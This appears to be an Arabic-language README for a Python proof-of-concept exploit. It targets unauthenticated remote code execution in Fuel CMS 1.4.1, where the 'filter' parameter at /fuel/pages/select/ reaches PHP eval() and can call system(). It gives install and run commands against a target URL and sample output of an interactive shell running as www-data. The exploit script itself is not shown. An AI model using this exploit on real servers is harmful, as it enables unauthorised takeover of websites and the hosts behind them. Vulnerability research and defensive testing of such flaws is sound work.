
PoC Python لتنفيذ التعليمات البرمجية عن بُعد غير مصادق عليه في Fuel CMS 1.4.1 عبر معلمة `filter`، مما يوفر قشرة تفاعلية لتنفيذ الأوامر.
ثغرة تنفيذ تعليمات برمجية عن بعد بدون مصادقة في Fuel CMS 1.4.1. يتم تمرير المعامل
filterفي نقطة النهاية/fuel/pages/select/دون تنقية إلى استدعاءeval()في واجهة PHP الخلفية، مما يسمح بتنفيذ تعليمات برمجية عشوائية عبر حمولة مصممة. على عكس الحقن الأعمى، يتم عكس المخرجات مباشرة في استجابة HTTP، لذا ليست هناك حاجة لملف وسيط.
/fuel/pages/select/ مع حمولة filter مصممة خصيصًا تستدعي system() الخاصة بـ PHP مع الأمر المطلوب.python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests prompt_toolkit
python3 exploit.py -t http://TARGET
مثال:
$ python3 exploit.py -t http://10.10.10.10
[*] Testing command execution...
[+] Target is vulnerable! Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Shell opened. Type 'exit' or Ctrl+C to quit.
Shell> whoami
www-data
Shell> hostname
fuel-cms
Shell> exit